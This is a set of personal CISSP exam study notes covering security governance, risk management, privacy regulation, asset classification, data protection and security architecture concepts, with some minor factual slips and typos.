0% found this document useful (0 votes)
662 views385 pages

CISSP Note (Original)

Uploaded by

Alvin Zeto
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
662 views385 pages

CISSP Note (Original)

Uploaded by

Alvin Zeto
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 385

Cybercrime statistics are escalating, both in scale and complexity. There were 493.

33 million
ransomware attacks worldwide in just 2022. The rate of cybercrime increased by 600% during the COVID-19
pandemic. Ransomware accounts for 10% of all breaches, while phishing is another common attack for data
breaches costing billions of $$ annually.

Top ransomware attack statistics of 2023


 The average cost of a ransomware attack was $1.85 million
 By 2031, statistics predict, ransomware attack will take place every 2 sec
 In the last five years, ransomware attacks have increased by 13%, according to Verizon’s 2022 data
breach report.
 Nearly 236.7 million ransomware attacks occurred worldwide in the first half of 2022.
 10% of breaches are due to ransomware.
 Ransomware breaches took 49 days longer to find & contain than the norm.
In the post-pandemic digital age, thanks to technologies like cloud computing, AI, machine learning, data
analytics, etc., the majority of firms perform their business online, which instantly connects them to every part
of the globe. While this connection makes it possible for businesses to operate from anywhere, it also increases
the possibility of hackers taking advantage of weak security systems and gaining access to crucial data mostly
targeting banking and financial services .
As the importance of cyber security increases, businesses are now heavily investing in cyber security and looking
for specialists that can help them decrease risk, prevent fraud, and preserve their future.
One of the most coveted, vendor-neutral and globally recognized certifications in the cybersecurity industry is
the CISSP — Certified Information Systems Security Professional, which is offered by the cybersecurity
professional organization (ISC)2. It is said that the CISSP certification is “a mile wide and an inch deep”. It
validates the skills and knowledge of security professionals in designing, developing and managing a
cybersecurity program
Nevertheless, obtaining this certification is not a simple task. To fully explore the vast and constantly changing
field of cybersecurity, one needs to invest time, energy, and a commitment to learn.
UK NARIC, the UK’s designated national agency in charge of providing information and expert guidance on
qualifications from all over the world, has deemed CISSP Certification status equivalent to Level 7 Master’s
Degree and will apply both to the UK and across Europe.
According to the most recent ISC2 website update, there are only 159,679 CISSPs worldwide as
of March 2023, with the United States accounting for 95,243 of those, the United Kingdom for
8486, Canada for 6842, China for 4136, Japan for 3699, India for 3364, Australia for 3305,
Singapore for 2963 and Israel for 434.
Welcome, I’m Hemant Patkar, a Cybersecurity Professional working for a prominent consulting firm in London.
I’m a member of the information security team of a leading bank in the UK with experience across various
sectors in different countries such as the UK, Nordic region, Europe, and India, for more details please visit my
LinkedIn profile [Link] I am here to support you in obtaining your
CISSP certification with a goal of explaining each domain in a concise and easily understandable manner,
helping you not only to prepare for the exam but also to enhance your understanding and excel in the field of
cybersecurity.”
Although you can use this notes as a study guide, we also recommend you to read books and attempt as many
questions as you can before taking the exam.
These notes were created when I was preparing for CISSP exam which I cleared in first attempt on October 12,
2022. In the world of the internet, where there are a ton of resources, these brief notes are created after
viewing Mike Chappel’s LinkedIn 26 Hours “Prepare for CISSP” video course, reading the entire 9th
edition of the ISC2 CISSP Official Study Guide by Mike Chappel, Prabh Nair Coffee shots, Prashant
Mohan memory palace, the 8th edition of the CISSP All-in-One Exam Guide by Shon Harris, the Luke
Ahmed book “How To Think Like A Manager,” few good friends study inputs who had already done their
CISSP and solving approx. 4500 questions. Anyone studying for this difficult exam and wanting to learn about
information security will find the notes to be straightforward and simple to understand.
The CISSP certification exam covers eight distinct domains, each representing a specific aspect of information
security. These domains are outlined as follows:

1. Security And Risk Management (15% of the exam)


It covers key topics like setting and administering security governance, doing risk analyses, and compliance with
legal and regulatory requirements. It includes -
 The confidentiality, integrity, and availability of information;
 Security governance principles
 Compliance requirements
 Difficulties with information security law and regulation
 IT policies and procedures
 Risk-based management concepts

2. Asset Security (10% of the exam)


This domain deals with protecting information and assets, including the proper handling, classification, and
disposal of sensitive data. It includes -
 Managing requirements
 Data security restrictions
 Safeguarding privacy
 Asset’s retention
 Categorization and possession of data

3. Security Architecture And Engineering (13% of the


exam)
Here, the focus is on designing and implementing security systems and architectures, considering security
principles, secure design principles, and secure hardware and operating systems. It includes -
 Engineering processes using secure design principles.
 Fundamental concepts of security models
 Security capabilities of information systems
 Assessing and mitigating vulnerabilities in systems
 Cryptography
 Designing and implementing physical security

4. Communications and Network Security (13% of the


exam)
This domain covers the secure design, implementation, and management of network infrastructure, ensuring
the confidentiality of data in transit, its availability and high integrity. It includes -
 Protecting network parts
 Protecting communication channels
 The use of layout values in network design and their protection

5. Identity and Access Management aka IAM (13% of


the exam)
It involves managing user identities, enforcing access controls, and implementing identity and access
management systems to ensure appropriate access to resources. It includes -
 Physical and logical access to assets
 Identification and authentication
 integrating third-party identification services with identity as a service
 Authorization mechanisms
 The identity and access provisioning lifecycle

6. Security Assessment and Testing (12% of the exam)


This domain covers techniques and tools for assessing and testing security controls, identifying vulnerabilities,
and ensuring the effectiveness of security measures. Topics include:
 Vulnerability assessment and penetration testing
 Disaster recovery
 Business continuity plans
 Awareness training for clients

7. Security Operations (13% of the exam)


Here, the focus is on managing the security operations, including incident response, disaster recovery, and
implementing and monitoring security controls. It includes:
 Understanding and supporting investigations
 Requirements for investigation types
 Logging and monitoring activities
 Securing the provision of resources
 Foundational security operations concepts
 Applying resource protection techniques
 Incident management
 Disaster recovery
 Managing physical security
 Business continuity

8. Software Development Security (10% of the exam)


This domain integrates security into the software development lifecycle, including secure coding practices,
security testing, and secure deployment. This includes -
 Examining hazard evaluation
 Detecting weaknesses in source codes
By studying and mastering these eight domains, CISSP candidates can develop a comprehensive understanding
of information security and prepare themselves for the CISSP certification exam and for industry.
CISSP: Domain 1 Part 1— Security And Risk
Management : Easy Notes to Pass CISSP
Certification in 2023–24
[Link]
e51142f33603

OBJECTIVE

PART 1

ISC2 CODE OF ETHICS


SECURITY CONCEPTS
GOVERNANCE, RISK AND COMPLIANCE (GRC)
BUDGET (FUNDING)
ORGANIZATION STRUCTURE / PROCESS
REPORTING MODEL
CONTROL FRAMEWORK
LIABILITY
COMPLIANCE

ISC2 CODE OF EHICS


(Understand, adhere, and promote professional ethics)
A) ISC2 Code of professional ethics

B) Organizational Code of ethics

* ISC2 Code of professional ethics supports Organizational code of ethics *

ISC2 member is expected to do the following (Remember with PAPA)

1. Protect society, the common goal, necessary public trust and confidence
and the infrastructure.
2. Act honourably, honestly, justly, responsibly, and legally.
3. Provide diligent and competent service to principles.
4. Advance and protect the profession.

SECURITY CONCEPTS
C ONFIDENTIALITY(Disclose) — Only authorised entities have access to

the data, resources, and objects. Lock on safe provides confidentiality. Secrecy is
maintained.
Controls: Least privileges, Need to know, Access control and Encryption.
Example: Reputed Banks maintain confidentiality by NOT disclosing customer
data.
Common attacks: Social engineering, Monitoring and Eavesdropping, Theft
and Burglary.

———————————————————————————————

I NTEGRITY (Alter) — Ensures from unauthorized changes preserve accuracy

and completeness. Mostly Financial services data is most important. In order it to


be accurate HASH function is used verify data has not changed.
Controls: Hash, Checksum, Dual control, and Digital Signature.
Example: Ordering sealed food from Uber Eats or Just eat.
Common attacks: Software bugs, Data modification, Malicious code.

——————————————————————————————

A VAILABILITY(Destruct) — Data should be available to authorised users

always/whenever required.
Controls: RAID, Load Balancer, Backups, HA, and Remote site.
Example: Content Delivery Network such as Netflix, Amazon Prime.
Common attacks: Natural disaster, DDoS and Physical attacks.
GOVERNANCE
Process to manage organization which includes roles, policies and procedures to
make informed decisions.

Strategy: 3–5 Years, Tactical: 1–3 Years and Operational: 0–6


Months

Enterprise Governance (Corporate) — Board of Directors has 4 major


parts

1. Business Governance — COO


2. Finance Governance — CFO
3. IT Governance — CIO
4. Security Governance — CISO
Security Governance
Executive management, comprising the Board of Directors, are in charge and
establish a direction to guide strategy and policy.

Provides resources to security initiatives and includes security guidelines or


practices that lower risk to a manageable degree.

** * Security is Non-Functional Requirement because it is a Process ***

Good Governance requirement

1. To support organizational goals, IT/security strategy should be aligned


with business strategy.
2. Control and reduce risk to a reasonable level.
3. Describe and control resources.
4. Analyse performance indicators in relation to organizational goals.
5. Value delivery through information security investments that are
optimized and support organizational goals.

— -> Security should exist to support Mission, Vision and Business objectives of
organization.

— -> Senior leadership should have support.

— -> Integrate Risk management across all process.

— -> Infosec management validates appropriate policies, procedures, standards,


and guidelines are implemented to ensure business operations are conducted at
acceptable level

GOVERNANCE, RISK AND COMPLIANCE (GRC)

*** Governance Process-Security steps ***


1. Stakeholder Interest.
2. Goals & Objectives.
3. Infosec policy, guidelines, and procedures.
4. Infosec program implementation.
5. Level of implementation.
6. Program result.
7. Business mission impact.

 ** Risk Capacity vs Risk Tolerance vs Risk Appetite ***

F ramework comes before standards

Budget (Funding) — → Driving factor for any


organization

1. Staff count.
2. Staff qualification.
3. Level of security controls required.
4. Task to be performed.
5. Regulations to be met.
6. Training required.
7. Degree of metric tracking.

Organization Structure / Process

REPORTING MODEL
CISO should report as high as possible in organization because:

1. To maintain visibility of the importance of the Infosec.


2. Limit disturbance or inaccurate translation of message.
Different model of reporting for Security Officer (CISO)

1. To CEO — — — — — — — — — → Best
2. To CIO/CTO (IT Department)— —> 2nd Best
3. To COO (Admin/HR) — — —->3rd Best
4. To Insurance and risk department.
5. To Internal audit department. — —> Does not take any department
under them due to Conflict of Interest.
6. To legal department. — — — -> Limited to some legal aspects.
CONTROL FRAMEWORK

Framework is Planning to have an office while


Standard is Buying & arranging items in specific budget such as Desk, Chair
etc.

LIABILITY

C DUE CARE (DC) — (Corrective Control) — -> Duty (Action)

The level of care that a prudent person would have used in the same or similar
circumstances is known as “Due Care.” What the company owes the client.

Action taken by an organization to protect its stakeholders,


investors, employee, customer from harm.

D DUE DELIGENCE (DD) — (Detective Control )— →Verify (Checks)

Before engaging into a contract, it is customarily necessary to perform Due


Diligence on a company or individual. Any action carried out to show or provide
appropriate care.

Act of Investigation, Verification and Gap Assessment

Example

DUE CARE — Collecting data / Implementing patch (Always 1st)

DUE DELIGENCE — Verifying data / Verifying patch (After DC)

COMPLIANCE
Act of faithfully following an external mandate.

Law = To protect interest of individual.

Regulations = To control industries (Bank of England, RBI, Federal Reserve


Bank, DFSA, SEBI).

Privacy = Individual while Secrecy = Organization

Review below brief explanation of Domain 1 for last


minute overview — by Destination Certification

Upcoming Domain 1 PART 2 Agenda

REGULATION SUMMARY
INTELLECTUAL PROPERTY (IP) Protection
EXPORT/IMPORT RESTRICTION
DRM (DIGITAL RISK MANAGEMENT)
SECURITY POLICY, STANDARDS, PROCEDURES AND GUIDELINES
PERSONAL SECURITY POLICIES
SECURITY EDUCATION, TRAINING AND AWARENESS
RISK MANAGEMENT
UNDERSTANDING AND APPLY RISK MANAGEMENT
QUALITATIVE RISK ASSESSMENT
QUANTITATIVE RISK ASSESSMENT
RISK RESPONSE
ACCESS CONTROLS
VAPT
THREAT MODELLING (STRIDE,NIST and PASTA)
BCP / DR
CISSP: Domain 1 Part 2— Security And Risk
Management : Easy Notes to Pass CISSP
Certification in 2023–24
[Link]
49bbf1065d71

OBJECTIVE

PART 2

REGULATION SUMMARY
INTELLECTUAL PROPERTY (IP) Protection
EXPORT/IMPORT RESTRICTION
DRM (DIGITAL RISK MANAGEMENT)
SECURITY POLICY, STANDARDS, PROCEDURES AND GUIDELINES
PERSONAL SECURITY POLICIES
SECURITY EDUCATION, TRAINING AND AWARENESS
RISK MANAGEMENT
UNDERSTANDING AND APPLY RISK MANAGEMENT
QUALITATIVE RISK ASSESSMENT
QUANTITATIVE RISK ASSESSMENT
RISK RESPONSE
ACCESS CONTROLS
VAPT
THREAT MODELLING (STRIDE,NIST and PASTA)
BCP / DR

REGULATION SUMMARY

1. PCI-DSS ( Payment Card Industry Data Security Standard) —


Protecting credit card theft / fraud …..(It’s a STANDARD)

American Express, Discover Financial Services, JCB International, MasterCard,


and Visa Inc. founded the Payment Card Industry Security Standards Council
with the intention of supervising the continued development of the Payment Card
Industry Data Security Standard.

2. HIPPA (Health Insurance Portability and Accountability Act)— Health Care


Data Privacy.

It’s a high trust framework and applicable for covered entity.

3. GLBA (Gramm-Leach-Bliley Act) — (For Consumer/Individual) ……(It’s


an STANDARD)

Individual Financial data

4. SOX (Sarbanes–Oxley Act) — (For Corporate / Enterprise integrity)

Fraudulent accounting to safeguard investors

5. Privacy Shield — It’s a treaty between EU and US for data.

INTELLECTUAL PROPERTY (IP) PROTECTION


Industrial — Invention, Trademark, Industrial design

Copyright — Literacy, Art work.

C OPYRIGHT — 70 years after Death, 95 years after Publication and

120 years after Creation

Instead of concept protection, expression of ideas for music such as Feeling hurt
and loved.
E.g — Creating music or song in a particular way is Copyright

T RADE SECRETS

Provide the company with same type of competitive value or advantage.

E.g — Recipe of Soft drinks major or McDonald, KFC

P ATENT — 20 YEARS

This is the strongest form of protection for unique idea

E.g — Source code for any application


T RADEMARK — (Identifying business)

This is to protect Goodwill, Name, Symbol etc

TM — In process (Takes 6month to 1 year for approvals)

R — Approved (Registered)

EXPORT/IMPORT RESTRICTION

E xport Restriction:

Wassenaar Arrangement: This limits the development of military capabilities that


can endanger the security and stability of the area and the world.

I mport Restrictions:

Law: To import of commodities, data, etc.

DRM (Digital Rights Management)


This solution regulates the transfer of intellectual property. DLP is frequently
combined with DRM (Data Leak Prevention).
Data at Transit — Yes

Data in Use — Yes

Data at Rest — No

DRM’s primary function is to safeguard IP.

E.g: Netflix and its controls

SECURITY POLICY, STANDARDS, PROCEDURES AND


GUIDELINES
Policy = Written aspects of governance / Intent of Senior management / To be
reviewed Yearly

Senior management responsible for policy approvals.


Example 1

Policy = Using a password that is encrypted.

Standard = 8 character long

Procedure = Step by step process

Baseline = 128 bit size

Guideline = Do not share

PERSONAL SECURITY POLICIES

1. Employee screening — Job descriptions, reference checks, examinations


of credentials (education and certifications), and background checks.
2. Vendor consultation and contractor controls.
3. Employee agreement and policies — Code of conduct, gift handling,
ethics statement, non-disclosure, non-compete (cannot work for
competitor), and acceptable use.
4. Employee Termination policies.
5. Privacy.

Separation of Duties (SoD)

This is the main to AVOID fraud — — — Since it prevents one individual from
being able to complete all steps of a procedure.

Person1 — ->Creates Purchase Order

Person2 — ->Sign Cheque


Person3 → Authorize and Pass

Mandatory Vacations

This is primarily to DETECT fraud

Job Rotations (People movement)

This is to PREVENT fraud — — decreases the likelihood of a collision between


people.

Termination

1. Lock user account.


2. Recover property (Laptop, Desktop etc).
3. Exit interview.
4. Review NDA.

Onboarding

1. Review contract terms and Job description.


2. Sign NDA.
3. Training.
4. Process and Policies awareness.

ESTABLISH AND MANAGE SECURITY EDUCATION,


TRAINING AND AWARENESS
Policy — Specify what to do.

Education — Modify Career. ( Formal Class — Long Term)

Training — Upgrade/Boost skills. (Semi Formal — Mid Term)


Awareness — Alter behaviors. (Information — Short Term)

CORE AREAS
Program Effective Evaluation — Depends upon

1. Participant testing.
2. Penetration testing.
3. Log review.

Periodic Content Reviews

1. Security Tools.
2. Applicable Laws.
3. Organization Security Policy.
4. Recent attack styles and methodologies

Best awareness Training — As Security decreases, Incident reports


increases.

RISK MANAGEMENT
UNDERSTANDING AND APPLY RISK MANAGEMENT.
Risk — It is the end result of the functions of threat, vulnerability, event
likelihood, and probable organizational effects of an event.

Threat — Action (Malicious actors)

Vulnerability — A flaw / Weakness

Impact — Potential harm

Risk (Event to occur) = Vulnerability(Exposure) + Threat source


(Intentional / Unintentional)

RISK = IMPACT x LIKELIHOOD x THREAT

(Likelihood and impact are the by-products that determine risk)


LIKELIHOOD DETERMINATION

D etermine the likelihood that each threat can exploit a vulnerability.

Determine how the value of the affected asset will be eliminated.

Definition of impact to an organization often include loss of

1. Life
2. Dollar $$
3. Prestige
4. Market share

Threats and Vulnerabilities

Natural, Criminal, Software, Physical, Personal, User Error (Unskilled worker)

QUALITATIVE RISK ASSESSMENT (Low, Med, High)


Organizations use qualitative risk assessment in 70–80% of cases. Best
example is Internal Audit

Condition of Qualitative Risk Assessment

1. A lack of competence among risk assessors.


2. There is not much time to finish the risk assessment.
3. Insufficient or limited data available.
4. Available assessors are seasoned workers with extensive knowledge of
crucial business and IT systems.

QUANTITATIVE RISK ASSESSMENT ($$)

Considering there is a virus attack on Database Server hosting critical data.

1. Asset Value (AV) of Database server = $1000


2. Exposure factor (EF) to threat i.e. Virus attack = 70% of server data
lost
3. Single Loss Expectancy (SLE) = $1000 x 70% = $700
4. Annual Risk Occurrence (ARO) = 4 times a year
5. Annual Loss Expectancy (ALE) = $700 X 4 = $2800

Always take decision based on ALE not SLE


RISK RESPONSE
CONSIDERATION FOR SELECTION OF CONTROLS

1. Strong business justification for Security measures i.e cost-effective


2. Cost-benefit evaluation.
3. Investment return on security.
4. Risk assessment team must evaluate the security controls functionality
and effectiveness.
5. You must take operational impact, cost effectiveness, and
security effectiveness into account while choosing countermeasures.

ACCESS CONTROLS

SECURITY CONTROL CATEGORIES


Vulnerability Assessment and Penetration Testing
(VAPT)
VA — Only identifies vulnerability / weakness

PT — Exploits vulnerability

You should have a limited configuration template and a complete asset


inventory as a CISO (1 configuration template for 100 servers and not 100
servers with 100 different configuration)

VAPT Steps

THREAT MODELLING (STRIDE,NIST and PASTA)


Scope — Network, System, Application and Data.

1. Identify threat agents and possible threats.


2. Understand current controls.
3. Identify exploitable vulnerabilities.
4. Prioritize identifies risks.
5. Identify controls to reduce risks to acceptable levels.

Threat modelling @ design stage before build

S TRIDE (Spoofing, Tampering, Repudiation, Info Disclosure, DoS

and Elevation of Privilege) — Developed by Microsoft

Microsoft’s STRIDE methodology seeks to guarantee that an application satisfies


the security standards of Confidentiality, Integrity, and Availability (CIA) in
addition to Authorization, Authentication, and Non-Repudiation.
N IST (National Institute of Standards and Technology)

P ASTA (Process for Attack Simulation and Threat Analysis)

PASTA threat modelling combines an attacker perspective of a business with risk


and impact analysis to create a complete picture of the threats to products and
applications, their vulnerability to attack, and informing decisions about risk and
priorities for fixes.

RISK MANAGEMENT METHODOLOGIES

1. Governance review — Process, Certifications.


2. Site security reviews — Client visit.
3. Formal security audit — End to end audit.
4. Penetration testing — Planning to use product/cloud platform.

REGULAR 3RD PARTY ASSESSMENT

1. On-site assessment.
2. Document exchange and review.
3. Process / Policy review.
SLA vs ASSURANCE vs SLR

Service Level Requirement (SLR)

Service Level Agreement (SLA)

BUSINESS CONTINUITY PLANNING (BCP) AND


DISASTER RECOVERY (DR)
B CP (Business Continuity Plan)— For Business

The documentation of predetermined set of instructions or procedures that


describes how a company’s business operations will continue to function in the
event of a major disruption.

D R (Disaster Recovery)— For System / IT Infrastructure

A defined strategy for recovering one or more information systems at a different


location in the event of a significant hardware or software failure.
BIA — (Business Impact Analysis)

Things to do if any change in business applications.

1. Develop contingency policy.


2. Conduct BIA.
3. Identify preventive controls.
4. Create contingency strategies.
5. Develop contingency plan.
6. Plan, Testing, Training and Exercise.
7. Plan maintenance.

MTD — Max Tolerable Downtime (Acceptable downtime agreed with customer


without significant harm to business)

RTO — Recovery Time Objective (Time to restore services e.g from Secondary
DC)

RPO — Recovery Point Objective (Acceptable Data Loss). This only deals with
Data and its Backup.

WRT — Work Recovery Time (Back to Primary DC)


CISSP: Domain 2 — Asset Security : Easy
Notes to Pass CISSP Certification in 2023–24
[Link]
6f96c01d4134

OBJECTIVE
INFORMATION AND ASSET (IDENTIFY AND CLASSIFY)
ASSET LIFECYCLE
INFORMATION AND ASSET OWNERSHIP
PROTECT PRIVACY
ASSET RETENTION (EOL and EOS)
DATA SECURITY CONTROLS
INFORMATION AND ASSET HANDLING REQUIREMENTS
DATA REMANENCE

INFORMATION AND ASSET


Asset = Anything that generate value and based on Asset value its level of control
is determined

Q) Why asset classification is required?


Answer : So that asset will receive appropriate level of protection.

So Classification (Deals with access) and Categorization (Deals with impact)


S ENSITIVITY = Amount of damage with information disclosure (PII or PHI)

C RITICALITY = REVENUE DRIVEN LOSS (Disconnection in Zoom,

GotoMeeting hosted in cloud)

MILITARY

 Top secret —Intelligence in communications and cryptography


 Secret — Few military strategies
 Confidential — Information on the power of the ground forces
 Sensitive unclassified — Information marked “For Official Use Only”
 Unclassified — Information that may be made public with permission
COMMERCIAL / BUSINESS

 Sensitive — Intellectual property, PHI protected


 Confidential — Vendor contracts, employee evaluations
 Private — Client names or pictures
 Proprietary — Organizational procedures
 Public —Information that is accessible to everyone

DATA LIFE CYCLE

Individual who owns data decides classified


Data owner should review classification at least annually
10 STEP DATA CLASSIFICATION

1) Define classification level.


2) Define criteria how to classify.
3) Identify who will classify data.
4) Identify data custodian.
5) Indicate security controls.
6) Document exceptions.
7) Specify how custody of data internally transferred.
8) Create a process to review classification periodically.
9) Create process to declassify data.
10) Incorporate above in security in security awareness training.

PROTECT PRIVACY AND DETERMINE AND MAINTAIN


OWNERSHIP

*** Individual should have control over their personal


information ***

Personal information must be :

1) Obtain fairly and lawfully.


2) Used only for the original specified purpose.
3) Adequate, relevant and not excessive to purpose.
4) Accurate and up to date.
5) Accessible to subjects.
6) Kept secure.
7) Destroyed after its purpose is completed.

C ANADA PERSONAL INFORMATION PROTECTION AND

ELCTRONIC DOCUMENT ACT (PIPEDA)

 This is general privacy regulation in Canada for any company operating


in Canada collecting data of Canadian citizens.

A SIA PACIFIC ECONOMIC CO-OPERATION (APEC) PRIVACY

FRAMEWORK.

 It is NOT a Regulation but framework.


 Agreed between 28 countries.

G ENERAL DATA PROTECTION REGULATIONS (GDPR)

 Applicable to any company operating in EU/ or outside collecting and


processing data of EU citizen.
 In GDPR data breach should be reported in 72 hours.
GDPR 7 Privacy Principles:

DATA OWNER / CONTROLLER— Who owns the Data

DATA CUSTODIAN / PROCESSOR — Cloud Service Provider (Internal IT,


Security, DBA team)

DATA STEWARD— Compliance officer, Privacy officer, Quality officer


(Business)
For US — Data Controller and Data Custodian (remember by C)

For EU — Data Owner and Data Processor

DATA PROTECTION OFFICER (DPO) FOR GDPR

O (OECD) The Organization for Economic Co-operation and Development is a

special venue where the governments of 38 democracies with market-based


economies work together to create norms for public policy that will support long-
term economic progress.

OECD Privacy Guidelines

1) Data collection.
2) Data quality principle.
3) Purpose specific principle
4) Use limitation principle.
5) Security safeguard principle.
6) Openness principle (Disclose how data is managed).
7) Individual participation principle.
8) Accountability principle (You are accountable).

Q UALITY ASSURANC QUALITY CONTROL (QAQC)

QC = Quality assessment based on INTERNAL process to maintain


quality.

QA = Quality assessment based on EXTERNAL process to review QC and


maintain quality.

 Prevent the error and correct the error


 Building effective overall archiving and data retention policy

END OF LIFE POLICY (EOL)


Vendor to STOP supporting after EOL

1) Secure disposal of asset and its related data.


2) Time to transition to new platform.
3) Should be made 6 months prior.
4) Data removal / Sanitize before decommissioning the asset after EOL.

DATA SECURITY CONTROLS


1) Baselining.
2) Scoping and Tailoring.
3) Standard selection.
4) Cryptography.

B aseline : 1st layer of Defense of depth approach to have network security (i.e

minimum security control). Establish minimum set of safeguard to protect IT


infrastructure.

Example: Password 8 character, Antivirus etc

T ailoring : After baseline for specific use. After modification of controls as

per business requirement.

S coping : Limiting general baseline recommendation by removing those that

do not apply.

 Defining boundary
 Pick the required control as per need and eliminate rest

PLAN-DO-CHECK-ACT CYCLE
DATA AT REST (DAR)

Data residing in STORAGE

DAR Protection

1. TPM (Trusted Platform Module)

a) Chip integrated to computer that provide crypto processor (Device Auth)


b) Cryptography keys are incorporated in the device.
Example: Bit Locker
2. SED (Self Encryption Device)

Encryption key is included but should be stored separately and updated on


regular basis
Example: Pen Drive use SED

DATA IN TRANSIT
DATA PROTECTION

1. LINK ENCRYPTION (MOST SECURE but SLOW)

a) Encrypts all data long a common path


b) Data + Router header encryption.
c) TUNNEL mode of VPN
d) Provided by service provider.
e) Encrypt Decrypt at every layer
f) Layer 2

Advantage —
a) All data is encrypted

Disadvantage —
a) Traffic repeatedly encrypted decrypted when the data is at the node.
b) It will be clear and vulnerable.

2. END-TO-END ENCRYPTION (LESS SECURE but FAST)


a) Encrypts only Data
b) TRANSPORT mode of VPN
C) Layer 7

Advantage —
a) E2EE stops messages from being intercepted mid-transit.
b) E2EE offers exclusively is keeping the service providers from accessing the
messages.

Disadvantage —
a) It only protects the message in transit — once the message reaches its
endpoint,.
b) It does not hide message metadata, such as the time the message was sent and
who it was sent to.

DATA IN USE
M ASKING : is the technique of altering sensitive data such that software or

authorised personnel can still access it but that it is of no or little value to


unauthorised intruders.

Data de-identification via anonymization

a) Removing information that can be used by individual.


b) Used to protect the confidentiality of sensitive data.

DAM (Digital Asset management) and DLP (Data Leak


Prevention) — Effective when Data in use
T OKENIZATION : is the procedure of replacing a sensitive data element

with a non-sensitive equivalent that is known as a token and has no inherent or


exploitable meaning or value. (POS uses tokenization)

Example: Vallet parking gives TOKEN number for car key

DATA PROTECTION

1. 1st step is to Identify and categorize


2. Next step is to label, mark or otherwise classify the type of data to ensure
proper level of protection are employed.

Example: In pdf when we comment = MASKING and


when we colour for future reference = LABEL (Fast Tag in cars = LABEL)

Data Owner assigns LABEL


ASSET IDENTIFICATION

DATA REMANENCE
HDD — Magnetically written into drive by altering magnetic field.

SDD — Use flash memory to store data.

Media Sanitization Types

Delete Data Technique as below

Degaussing (Purging) — For HDD only (Disk cannot be reused)


Destruction — For HDD and SDD (Disk cannot be reused)

SSD only solution is DESTRUCTION

ANTI REMANENCE TECHNIQUE

CRYPTO SHREDDING / ERASER (By key destruction)

1. For cloud data destruction and its still logical process.


2. Logical process is still LESS SECURE than physicial process.
3. User / Data owner can directly delete encrypted data key hence cloud
SME cannot decrypt.
4. Uploading data in cloud in encrypted form hence can delete when not
required.
CISSP: Domain 3 — Security Architecture &
Engineering : Easy Notes to Pass CISSP
Certification in 2023–24
[Link]
6685ae748974

OBJECTIVES
PROCESSESS USING SECURITY DESIGN PRINCIPLE
FUNDAMENTAL CONCEPT OF SECURITY MODELS
SELECT CONTROL BASED UPON SYSTEM SECURITY REQUIREMENTS
SECURITY CAPABILITIES OF INFORMATION SYSTEMS
VULNERABILITIES OF SECURITY ARCHITECTURES, DESIGNS AND
SOLUTION ELEMENTS
CRYPTOGRAPHY
PHYSICAL SECURITY

ENGINEERING PROCESS

1) Discover info protection


2) Define system security requirement
3) Design System Architecture
4) Develop detailed Security design
5) Implement security system
6) Assess effectiveness (working effectively)
Implement And Manage an Engineering Lifecycle Using Secure Design
Principles.
~ Threat modelling
~ Least privilege
~ Defense In Depth
~ Secure default (e.g Linux) disable by default
~ Fail securely (e.g. Firewall) all close if failed
~ Separation of Duties
~ Keep it simple (e.g. Google SSO to access multiple sites)
~ Zero Trust
~ Privacy by design
~ Trust but verify
~ Shared responsibility

ECONOMY OF MECHANISM (KEEP IT SIMPLE)

More complex program means more bugs which will lead to more
vulnerabilities

~ Unnecessary functionality or security mechanism should be avoided


~ Strive for Simplicity
~ Srive for ease of operation

PRIVACY BY DESIGN

It is a framework embedding into the Design and Operation of IT System,


Network Infrastructure and Business Practice

Introduce Privacy by Design by Phase 1


~ Proactive, not Reactive
~ Lead with privacy as default settings
~ Embed privacy into
~ Ensure end-to-end security
~ Maintain visibility and transparency
~ Respect over privacy (How data is collected)
~ Retain full functionality

ZERO TRUST

It is a security model, a set of system design principle and a coordinated


cybersecurity and system management strategy based on an acknowledge that
threats exists in both INSIDE and OUTSIDE network boundaries.

Ultimate objective is to prevent data breaches and limit lateral movements

Principle of Zero Trust

1. Always verify (Authenticate Authorize every access attempt)


2. Use least privilege access (Assign minimum rights)
3. Assume breach (Assume worst case scenario)

UNDERSTAND FUNDAMENTAL CONCEPTS OF


SECURITY MODEL

Enterprise Architecture Blueprint requires


1) Foundation Policy
2) Hardware
3) Operating System
4) Database
5) Network
6) API
7) Hypervisor
8) Application
9) User
10) Data

Enterprise Architecture

Enterprise Security Architecture


1)Implement building blocks of Information Security Infrastructure
2) Focused on setting long term strategy
3) Establish priorities for Security Infrastructure

Common System Components: Processor


1)Fetching Data
2) Decoding Data
3) Executing Data
4) Storing Data

Increasing Performance of Any System

 Multitasking — (Heavy on CPU), 1 CPU, Execute more than 1 task


simultaneously
 Multiprocessing — Multiple CPU, Execute more than 1 process
 Multithreading — (Easy on CPU) Execute different part of program at
same time. Splitting into smaller blocks. MOST EFFICIENT

Firmware (E.g. BIOS)


1)Storage of program in ROM
2) Embedded in hardware to control hardware
3) Non Volatile

UNDERSTAND SECURITY CAPABILITIES OF


INFORMATION SYSTEM.

1. Memory Protection
2. TPM (Trusted Platform Module)
3. Cryptographic Module
4. HSM (Hardware Security Module)

Generic OS / Computer Model


Level 0 — OS Kernel

Level 1 — Other OS components

Level 2 — Device Driver, Communication, Data

Level 3 — User Application

TCB — Provides CONFIDENTIALITY and INTEGRITY

Trusted Computing (e.g. VPN)


Its an Framework (Concept). One single component cannot define overall security
Security Kernel (Reference Monitor) — — -> Acts like an interface between User
and Kernel and then gives access to application
SECURITY KERNEL

1. Monitors and validates access control over system object


2. Enforcement and validation component of all security OS
3. To max the effectiveness of security kernel (The user subject must e
executed with the least privilege necessary to perform their function)
4. Kernel provides the services by acting as an interface between other
program operating under its control and the physical hardware of the
computer that insulates program running on system from the
complexities of the computer

TRUSTED PLATFORM MODULE (TPM)


ISO / IEC 11889 Certified Service

TPM = Secure Crypto processor

1. Attestation : Creates crypto hash


2. Binding : Encrypt Data
3. Sealing : Ensures Ciphertext can be decrypted
RACE CONDITION
Doing same function at same time creating CONFLICT. A Race condition is a
scenario that occurs in a multithreaded environment due to multiple threads
sharing the same resource or executing the same piece of code. If not handled
properly, this can lead to an undesirable situation, where the output state is
dependent on the order of execution of the threads.

Example 1 — Bedroom with 2 different switch to turn ON and OFF

Example 2– Two people trying to purchase ta same time online

Example 3 — Consider the operation of adding money to your bank account. Let
us say you are doing so using two different apps simultaneously. The following
steps take place while doing so:

1. The app reads your current balance


2. The additional amount is added to the current balance
3. The bank balance is finally updated

